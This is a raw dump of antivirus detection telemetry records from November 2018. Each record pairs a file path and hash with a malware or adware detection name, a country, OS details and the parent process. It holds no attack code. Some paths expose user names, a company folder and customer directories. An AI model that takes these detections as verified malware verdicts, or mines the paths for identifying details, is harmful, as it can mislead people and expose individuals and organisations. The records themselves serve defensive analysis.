  Row(detection=Row(filename='setup_20.htm', filepath='C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\TANTO CITRA MANDIRI Team Folder\\Campur2\\File Epson\\Manual\\SetupGuide\\ID\\setup_20.htm', filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='97c3cfb8f724d4870e4ab825455e50808e5175c672e2688ebd4b18ca13fc24b5', metadata=Row(cmdline='\\\\\\/systemstartup', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-02T07:29:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='h5_mapeditor.exe', filepath='C:\\Users\\X\\Desktop\\Might And Magic V Hammers Of Fate\\bina1\\H5_MapEditor.exe', filesize=17408000, name='W32/Ramnit.CD.#M1.#R1'), hash='97cc1d47bbcafb61b42f27e4f2f49169a61cde004ab91f310afe6fbfeb863401', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-02T16:51:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0078983.exe', filepath='D:\\System Volume Information\\_restore{74287D37-4381-464D-8D02-0FE8636E81A2}\\RP327\\A0078983.exe', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='98ddf9522f992afb449837013a3c724c6f757d8447a756ee6debcd264a796b1a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0078983.exe', filepath='D:\\System Volume Information\\_restore{74287D37-4381-464D-8D02-0FE8636E81A2}\\RP327\\A0078983.exe', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='98ddf9522f992afb449837013a3c724c6f757d8447a756ee6debcd264a796b1a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmiadap.exe', filepath='C:\\Windows\\SysWOW64\\wbem\\WMIADAP.exe', filesize=128000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='999113aee6783853d56f3aa40bd524fc567df553aec310c797193704219930d7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='9996d6b25c31b6dd2cbaf6a91947f59b0d53da5e5dcfb6b94946de2fd489fbaf', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T11:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T10:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='C:\\AdwCleaner\\Quarantine\\C\\Users\\Arzani\\AppData\\Local\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9a433500a68682e31adc76345d0965a53ff6c930f059fe6a910a3bbbdf7242d9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=22216, timestamp='2018-11-02T07:05:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082252-1a3ec922', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d48d98b8\\AVSCAN-20181102-082049-03B6DDCB\\AVSCAN-20181102-082252-1A3EC922', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='9a433500a68682e31adc76345d0965a53ff6c930f059fe6a910a3bbbdf7242d9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082432-2cbeb87b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d48d98b8\\AVSCAN-20181102-082049-03B6DDCB\\AVSCAN-20181102-082432-2CBEB87B', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='9a433500a68682e31adc76345d0965a53ff6c930f059fe6a910a3bbbdf7242d9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='evcreate.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\evcreate.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9a55f7cadd5ffb14ae6cf9dc8955b09233830461091378fe1476ebeef4431e23', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:10:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='evcreate.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\evcreate.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9a55f7cadd5ffb14ae6cf9dc8955b09233830461091378fe1476ebeef4431e23', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='evcreate.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\evcreate.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9a55f7cadd5ffb14ae6cf9dc8955b09233830461091378fe1476ebeef4431e23', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:27:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9a8423d813950488a6b7d026f605486c3c56eafb8555750e2b0274f808d4c356', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-3\\9A8423D813950488A6B7D026F605486C3C56EAFB8555750E2B0274F808D4C356', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9a8423d813950488a6b7d026f605486c3c56eafb8555750e2b0274f808d4c356', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9ace743b057d899bfaef341cbdcfb3ba9213f5a0a188ac0591f73e3f7b4e5c22', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T00:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:46:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141930-f3f324d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a11a97a5\\AVSCAN-20181102-141814-ED93650F\\AVSCAN-20181102-141930-F3F324D4', filesize=1536000, name='TR/BitCoinMiner.fxkbh.#M1.#R1'), hash='9bb685774ab6d6bb03a67bb3b4217ee9bf2dbadea7d5d2eb1865121811584b3b', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:19:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\redstarpoker\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\redstarpoker\\mppoker.exe', parentsize=1214712, timestamp='2018-11-02T10:32:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\redstarpoker\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\redstarpoker\\mppoker.exe', parentsize=1214712, timestamp='2018-11-02T20:37:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-02T09:56:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\redkingsmpp\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\redkingsmpp\\mppoker.exe', parentsize=1214712, timestamp='2018-11-02T21:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asoftsqlexplorer.exe', filepath='E:\\KHACHHANG\\SongBinh\\CHIPHU\\Asoftsystem_2013\\AsoftSQLExplorer.exe', filesize=17024000, name='TR/Patched.Ren.Gen.#M300.#R2275'), hash='9c83b8af9585f98dc705ec050910fc571567e761a1632e1c222dbead9460a9ae', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"E:\\\\\\\\KHACHHANG\\\\\\\\SongBinh\\\\\\\\CHIPHU\\\\\\\\Asoftsystem_2013.rar\\\\\\" E:\\\\\\\\KHACHHANG\\\\\\\\SongBinh\\\\\\\\CHIPHU\\\\\\\\', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1567448, timestamp='2018-11-02T02:15:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hdeck.exe', filepath='D:\\Programas para la computadora\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIAHDAud\\Present\\HDADeck\\HDeck.exe', filesize=33792000, name='W32/Sality.AT.#M1.#R1'), hash='9cb0e22617f388ab8df14bedef5c074be57a6be6dde068fbae1b382e23eb8b02', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Nox\\bin\\Nox.exe', parentsize=6017792, timestamp='2018-11-02T11:16:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\9CB3C525708BF734CEBFF469B26C95C8C641311A1701BB9535645632D3CC6620', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\9CB3C525708BF734CEBFF469B26C95C8C641311A1701BB9535645632D3CC6620', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\9CB3C525708BF734CEBFF469B26C95C8C641311A1701BB9535645632D3CC6620', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T11:17:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T10:19:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instmsia.exe', filepath='C:\\Users\\X\\Desktop\\PMPL DATA\\C Drive Data\\Desktop\\all Desktop\\ashok\\Network_ScanGear\\driver\\us_eng\\DISK1\\instmsia.exe', filesize=1600000, name='TR/Patched.Ren.Gen.#M300.#R3369'), hash='9cbe015a4dbccb7ed24978676f9c478bd42201cb22fbec9454fb66517cac58b3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ws483KjNz0mPeM9e.1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:40:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='9cd14d5798ef90b357a1927a862d405ffb8627054cdc31827e2e2903f32cbdb8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:20:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER MY17\\TOOL\\VISTAMSV\\ENV\\VISTAMSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9cdaa924b376f3103e2749a00849aa492bbb7165f2040811d5447937a4bb95a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D2CC39370B7C63899AA2B4E7AFDC77D21194E09B48CEAB0F1A975053EB8C3D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D2CC39370B7C63899AA2B4E7AFDC77D21194E09B48CEAB0F1A975053EB8C3D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085959-b5cb5ae7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-085959-B5CB5AE7', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hdupdrv64.exe', filepath='i:\\program\\new pro 2017\\driver\\drv10.6+easydrv3.5.byghazi2010\\drivers\\audio\\audio g41\\via\\viahdaud\\HDUpDrv64.exe', filesize=64000, name='TR/Crypt.ZPACK.Gen4.#M1.#R1'), hash='9de29e66bd99e111035a0fd65a60c31d3d428b42d9e8f73bc5101f399b801137', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:44:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=2160000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9de49d033715d614b112839ff4b9628c8d2ff63c3ba6437d44da61bd5513dd29', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T22:29:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2160000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9de49d033715d614b112839ff4b9628c8d2ff63c3ba6437d44da61bd5513dd29', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T09:56:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9dfa90db31fc007507896028e58395805278fd7fc10a4a762d07b00e31541e93', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\9DFA90DB31FC007507896028E58395805278FD7FC10A4A762D07B00E31541E93', filesize=1172000, name='TR/Dropper.Gen.#M300.#R3670'), hash='9dfa90db31fc007507896028e58395805278fd7fc10a4a762d07b00e31541e93', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:04:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flt-d4sdlang.exe', filepath='\\?\\C:\\Program Files\\Codemasters\\DiRT Showdown\\flt-d4sdlang.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='9dfba7c99f7bad4fc9b9026a5e9fba685ef4733e97fcd5452b3bbb76b2ebad9d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:41:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashtoollib.v1.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\OPPO_CUSTOM_MDT_V2\\FlashToolLib.v1.dll', filesize=2752000, name='W32/Ramnit.CD.#M1.#R1'), hash='9e0befaf3971ab2474bdc12cc6da45ecb9f6350ad0cf8bf52ab649b77a943c73', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T04:28:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204517-11278c25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7152e2eb\\AVSCAN-20181102-204456-04D489F3\\AVSCAN-20181102-204517-11278C25', filesize=9344000, name='TR/Dldr.Sinresby.abfvn.#M1.#R1'), hash='9e13fec7ff37d8db304b41a9aa23a67bb6f407a3f94faf6d22c6e815c4080e98', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:45:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fscapture.exe', filepath='D:\\chengxu\\FSCapture\\FSCapture.exe', filesize=9344000, name='TR/Dldr.Sinresby.abfvn.#M1.#R1'), hash='9e13fec7ff37d8db304b41a9aa23a67bb6f407a3f94faf6d22c6e815c4080e98', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4245072, timestamp='2018-11-02T12:44:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9E4E80B760D990D08C455A290A87FBE4D014A3E58547F1300B702324232FD21A', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:43Z'), dt=datetime.date(2018, 11, 2)),
